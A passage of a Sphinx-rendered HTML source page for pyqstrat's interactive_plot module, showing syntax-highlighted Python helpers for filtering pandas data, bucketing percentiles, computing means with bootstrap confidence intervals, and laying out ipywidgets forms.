class=\"n\">DataFrame</span><span class=\"p\">]]</span>\n \n<span class=\"n\">DimensionFilterType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span>\n <span class=\"nb\">str</span><span class=\"p\">,</span>\n <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]]],</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">]</span>\n\n<span class=\"n\">DataFilterType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span>\n <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]]],</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">]</span>\n\n<span class=\"n\">StatFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">LineDataType</span><span class=\"p\">]]</span>\n\n<span class=\"n\">DetailDisplayType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span>\n <span class=\"n\">widgets</span><span class=\"o\">.</span><span 
class=\"n\">Widget</span><span class=\"p\">,</span> \n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span>\n <span class=\"nb\">bool</span><span class=\"p\">],</span>\n <span class=\"kc\">None</span><span class=\"p\">]</span>\n\n\n<span class=\"n\">PlotFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">LineDataType</span><span class=\"p\">]],</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">]]</span>\n\n<span class=\"n\">DataFrameTransformFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">],</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">]</span>\n\n<span class=\"n\">SeriesTransformFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">Series</span><span class=\"p\">],</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">Series</span><span class=\"p\">]</span>\n\n<span class=\"n\">DisplayFormFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">],</span> <span class=\"nb\">bool</span><span class=\"p\">],</span> <span class=\"kc\">None</span><span class=\"p\">]</span>\n\n<span class=\"n\">UpdateFormFuncType</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"nb\">int</span><span class=\"p\">],</span> <span class=\"kc\">None</span><span class=\"p\">]</span>\n\n<span class=\"n\">CreateSelectionWidgetsFunctype</span> <span class=\"o\">=</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"n\">UpdateFormFuncType</span><span class=\"p\">],</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]]</span>\n\n\n<div class=\"viewcode-block\" id=\"percentile_buckets\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.percentile_buckets\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">percentile_buckets</span><span class=\"p\">(</span><span class=\"n\">a</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"n\">n</span><span class=\"o\">=</span><span class=\"mi\">10</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span 
class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> &gt;&gt;&gt; np.random.seed(0)</span>\n<span class=\"sd\"> &gt;&gt;&gt; a = np.random.uniform(size=10000)</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert np.allclose(np.unique(percentile_buckets(a)), np.arange(0.05, 1, 0.1), atol=0.01)</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">a</span><span class=\"p\">):</span> <span class=\"k\">return</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">empty</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">)</span>\n <span class=\"n\">pctiles</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">arange</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">100</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"nb\">round</span><span class=\"p\">(</span><span class=\"mi\">100</span> <span class=\"o\">/</span> <span class=\"n\">n</span><span class=\"p\">)))</span> \n <span class=\"n\">buckets</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nanpercentile</span><span class=\"p\">(</span><span class=\"n\">a</span><span class=\"p\">,</span> <span class=\"n\">pctiles</span><span class=\"p\">)</span>\n <span class=\"n\">conditions</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"n\">bucket</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">buckets</span><span class=\"p\">[:</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]):</span>\n <span class=\"k\">if</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">]:</span>\n <span class=\"n\">conditions</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">a</span> <span class=\"o\">==</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">])</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">conditions</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">a</span> <span class=\"o\">&gt;=</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">])</span> <span class=\"o\">&amp;</span> <span class=\"p\">(</span><span class=\"n\">a</span> <span class=\"o\">&lt;</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"n\">i</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">]))</span>\n <span class=\"n\">conditions</span><span class=\"o\">.</span><span class=\"n\">append</span><span 
class=\"p\">((</span><span class=\"n\">a</span> <span class=\"o\">&gt;=</span> <span class=\"n\">buckets</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]))</span>\n <span class=\"n\">b</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">mean</span><span class=\"p\">(</span><span class=\"n\">a</span><span class=\"p\">[</span><span class=\"n\">cond</span><span class=\"p\">])</span> <span class=\"k\">for</span> <span class=\"n\">cond</span> <span class=\"ow\">in</span> <span class=\"n\">conditions</span><span class=\"p\">]</span>\n <span class=\"n\">ret</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">select</span><span class=\"p\">(</span><span class=\"n\">conditions</span><span class=\"p\">,</span> <span class=\"n\">b</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"n\">ret</span></div>\n\n\n<div class=\"viewcode-block\" id=\"display_form\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.display_form\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">display_form</span><span class=\"p\">(</span><span class=\"n\">form_widgets</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">],</span> <span class=\"n\">debug</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">debug</span><span class=\"p\">:</span> <span class=\"n\">clear_output</span><span class=\"p\">()</span>\n <span class=\"n\">box_layout</span> <span class=\"o\">=</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Layout</span><span class=\"p\">(</span>\n <span class=\"n\">display</span><span class=\"o\">=</span><span class=\"s1\">&#39;flex&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">flex_flow</span><span class=\"o\">=</span><span class=\"s1\">&#39;column&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">align_items</span><span class=\"o\">=</span><span class=\"s1\">&#39;stretch&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">border</span><span class=\"o\">=</span><span class=\"s1\">&#39;solid&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">width</span><span class=\"o\">=</span><span class=\"s1\">&#39;100%&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">box</span> <span class=\"o\">=</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Box</span><span class=\"p\">(</span><span class=\"n\">children</span><span class=\"o\">=</span><span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"n\">form_widgets</span><span class=\"p\">),</span> <span class=\"n\">layout</span><span class=\"o\">=</span><span class=\"n\">box_layout</span><span class=\"p\">)</span>\n <span class=\"n\">display</span><span class=\"p\">(</span><span class=\"n\">box</span><span class=\"p\">)</span></div>\n \n \n<div class=\"viewcode-block\" id=\"SimpleTransform\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleTransform\">[docs]</a><span class=\"k\">class</span> <span 
class=\"nc\">SimpleTransform</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Initial transformation of data. For example, you might add columns that are quantiles of other columns</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"SimpleTransform.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleTransform.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">transforms</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">SeriesTransformFuncType</span><span class=\"p\">]]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transforms</span> <span class=\"o\">=</span> <span class=\"p\">[]</span> <span class=\"k\">if</span> <span class=\"n\">transforms</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span> <span class=\"k\">else</span> <span class=\"n\">transforms</span></div>\n \n<div class=\"viewcode-block\" id=\"SimpleTransform.__call__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleTransform.__call__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__call__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"k\">for</span> <span class=\"p\">(</span><span class=\"n\">colname</span><span class=\"p\">,</span> <span class=\"n\">new_colname</span><span class=\"p\">,</span> <span class=\"n\">func</span><span class=\"p\">)</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transforms</span><span class=\"p\">:</span>\n <span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">new_colname</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">func</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">colname</span><span class=\"p\">])</span>\n <span class=\"k\">return</span> <span class=\"n\">data</span></div></div>\n \n\n<div class=\"viewcode-block\" id=\"simple_dimension_filter\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.simple_dimension_filter\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">simple_dimension_filter</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">dim_name</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span 
class=\"n\">selected_values</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]])</span> <span class=\"o\">-&gt;</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Produces a list to put into a dropdown for selecting a dimension value</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">mask</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">),</span> <span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">value</span> <span class=\"ow\">in</span> <span class=\"n\">selected_values</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"n\">value</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;All&#39;</span><span class=\"p\">:</span> <span class=\"k\">continue</span>\n <span class=\"n\">mask</span> <span class=\"o\">&amp;=</span> <span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">value</span><span class=\"p\">)</span>\n <span class=\"n\">values</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">mask</span><span class=\"p\">][</span><span class=\"n\">dim_name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">)</span> <span class=\"c1\"># will sort values before returning them</span>\n <span class=\"k\">return</span> <span class=\"p\">[</span><span class=\"s1\">&#39;All&#39;</span><span class=\"p\">]</span> <span class=\"o\">+</span> <span class=\"n\">values</span><span class=\"o\">.</span><span class=\"n\">tolist</span><span class=\"p\">()</span></div>\n \n \n<div class=\"viewcode-block\" id=\"simple_data_filter\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.simple_data_filter\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">simple_data_filter</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">selected_values</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]])</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Filters a dataframe based on the selected values</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">mask</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span 
class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">),</span> <span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">value</span> <span class=\"ow\">in</span> <span class=\"n\">selected_values</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"n\">value</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;All&#39;</span><span class=\"p\">:</span> <span class=\"k\">continue</span>\n <span class=\"n\">mask</span> <span class=\"o\">&amp;=</span> <span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">value</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">mask</span><span class=\"p\">]</span></div>\n \n \n<div class=\"viewcode-block\" id=\"MeanWithCI\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.MeanWithCI\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">MeanWithCI</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Computes mean (or median) and optionally confidence intervals for plotting</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"MeanWithCI.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.MeanWithCI.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">mean_func</span><span class=\"p\">:</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">],</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nanmean</span><span class=\"p\">,</span> <span class=\"n\">ci_level</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"mi\">0</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"c1\"># type: ignore</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> mean: The function to compute ci for</span>\n<span class=\"sd\"> ci_level: Set to 0 for no confidence intervals, or the level you want.</span>\n<span class=\"sd\"> For example, set to 95 to compute a 95% confidence interval. 
Default 0</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">mean_func</span> <span class=\"o\">=</span> <span class=\"n\">mean_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span> <span class=\"o\">=</span> <span class=\"n\">ci_level</span></div>\n \n<div class=\"viewcode-block\" id=\"MeanWithCI.__call__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.MeanWithCI.__call__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__call__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">filtered_data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">xcol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">zcol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">LineDataType</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> For each unique value of x and z, compute mean (and optionally ci) of y.</span>\n<span class=\"sd\"> Return:</span>\n<span class=\"sd\"> x, y data for plotting lines of the mean of y versus x for each z and the data used to compute the mean</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">zvals</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">filtered_data</span><span class=\"p\">[</span><span class=\"n\">zcol</span><span class=\"p\">])</span>\n <span class=\"n\">cols</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">col</span> <span class=\"k\">for</span> <span class=\"n\">col</span> <span class=\"ow\">in</span> <span class=\"n\">filtered_data</span><span class=\"o\">.</span><span class=\"n\">columns</span> <span class=\"k\">if</span> <span class=\"n\">col</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"p\">[</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">,</span> <span class=\"n\">zcol</span><span class=\"p\">]]</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">filtered_data</span><span class=\"p\">[[</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">,</span> <span class=\"n\">zcol</span><span class=\"p\">]</span> <span class=\"o\">+</span> <span class=\"n\">cols</span><span class=\"p\">]</span>\n <span class=\"n\">ret</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"n\">columns</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">]</span> <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span> <span class=\"k\">else</span> <span class=\"p\">[</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span 
class=\"n\">ycol</span><span class=\"p\">,</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;ci_d_</span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">,</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;ci_u_</span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">]</span>\n <span class=\"k\">for</span> <span class=\"n\">zvalue</span> <span class=\"ow\">in</span> <span class=\"n\">zvals</span><span class=\"p\">:</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">filtered_data</span><span class=\"p\">[</span><span class=\"n\">filtered_data</span><span class=\"p\">[</span><span class=\"n\">zcol</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">zvalue</span><span class=\"p\">]</span>\n <span class=\"n\">plt_data</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">yseries</span> <span class=\"ow\">in</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">groupby</span><span class=\"p\">(</span><span class=\"n\">xcol</span><span class=\"p\">)[</span><span class=\"n\">ycol</span><span class=\"p\">]:</span>\n <span class=\"n\">y</span> <span class=\"o\">=</span> <span class=\"n\">yseries</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">y</span><span class=\"p\">):</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"n\">y</span><span class=\"p\">)</span>\n <span class=\"n\">mean</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">mean_func</span><span class=\"p\">(</span><span class=\"n\">y</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span><span class=\"p\">:</span>\n <span class=\"n\">ci_up</span><span class=\"p\">,</span> <span class=\"n\">ci_down</span> <span class=\"o\">=</span> <span class=\"n\">bootstrap_ci</span><span class=\"p\">(</span><span class=\"n\">y</span><span class=\"p\">,</span> <span class=\"n\">ci_level</span><span class=\"o\">=</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span> <span class=\"o\">/</span> <span class=\"mi\">100</span><span class=\"p\">)</span>\n <span class=\"n\">plt_data</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">mean</span><span class=\"p\">,</span> <span class=\"n\">ci_down</span><span class=\"p\">,</span> <span class=\"n\">ci_up</span><span class=\"p\">))</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">plt_data</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">x</span><span class=\"p\">,</span> <span 
class=\"n\">mean</span><span class=\"p\">))</span>\n <span class=\"n\">line</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">(</span><span class=\"n\">plt_data</span><span class=\"p\">,</span> <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"n\">columns</span><span class=\"p\">)</span>\n <span class=\"n\">ret</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">zvalue</span><span class=\"p\">,</span> <span class=\"n\">line</span><span class=\"p\">,</span> <span class=\"n\">df</span><span class=\"p\">))</span>\n <span class=\"k\">return</span> <span class=\"n\">ret</span></div></div>\n \n \n<div class=\"viewcode-block\" id=\"SimpleDetailTable\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleDetailTable\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">SimpleDetailTable</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Displays a pandas DataFrame under a plot that contains the data used to compute a statistic of y for each x, y pair</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n \n<div class=\"viewcode-block\" id=\"SimpleDetailTable.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleDetailTable.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">colnames</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">float_format</span><span 